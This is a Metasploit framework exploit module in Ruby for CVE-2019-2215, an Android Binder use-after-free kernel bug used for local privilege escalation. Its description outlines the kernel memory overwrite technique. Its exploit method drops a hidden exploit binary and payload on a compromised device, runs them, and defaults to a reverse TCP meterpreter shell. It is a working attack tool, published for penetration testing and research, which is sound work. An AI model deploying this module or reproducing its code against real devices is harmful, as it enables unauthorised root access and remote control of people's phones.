metasploit-gs/modules/exploits/android/local/binder_uaf.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Common
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Android Binder Use-After-Free Exploit',
        'Description' => %q{
          This module exploits CVE-2019-2215, which is a use-after-free in Binder in the
          Android kernel. The bug is a local privilege escalation vulnerability that
          allows for a full compromise of a vulnerable device. If chained with a browser
          renderer exploit, this bug could fully compromise a device through a malicious
          website.
          The freed memory is replaced with an iovec structure in order to leak a pointer
          to the task_struct. Finally the bug is triggered again in order to overwrite
          the addr_limit, making all memory (including kernel memory) accessible as part
          of the user-space memory range in our process and allowing arbitrary reading
          and writing of kernel memory.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Jann Horn',    # discovery and exploit
          'Maddie Stone', # discovery and exploit
          'grant-h',      # Qu1ckR00t
          'timwr',        # metasploit module
        ],
        'References' => [
          [ 'CVE', '2019-2215' ],
          [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],
          [ 'URL', 'https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html' ],
          [ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],
          [ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],
        ],
        'DisclosureDate' => '2019-09-26',
        'SessionTypes' => [ 'meterpreter' ],
        'Platform' => [ 'android', 'linux' ],
        'Arch' => [ ARCH_AARCH64 ],
        'Targets' => [[ 'Auto', {} ]],
        'DefaultOptions' => {
          'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
          'WfsDelay' => 5
        },
        'DefaultTarget' => 0,
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_fs_getwd
            ]
          }
        },
        'Notes' => {
          'SideEffects' => [ ARTIFACTS_ON_DISK ],
          'Reliability' => [ UNRELIABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ]
        }
      )
    )
  end

  def upload_and_chmodx(path, data)
    write_file(path, data)
    chmod(path)
    register_file_for_cleanup(path)
  end

  def exploit
    local_file = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-2215', 'exploit')
    exploit_data = File.read(local_file, mode: 'rb')

    workingdir = session.fs.dir.getwd
    exploit_file = "#{workingdir}/.#{Rex::Text.rand_text_alpha_lower(5)}"
    upload_and_chmodx(exploit_file, exploit_data)
    payload_file = "#{workingdir}/.#{Rex::Text.rand_text_alpha_lower(5)}"
    upload_and_chmodx(payload_file, generate_payload_exe)

    print_status("Executing exploit '#{exploit_file}'")
    result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}")
    print_status("Exploit result:\n#{result}")
  end
end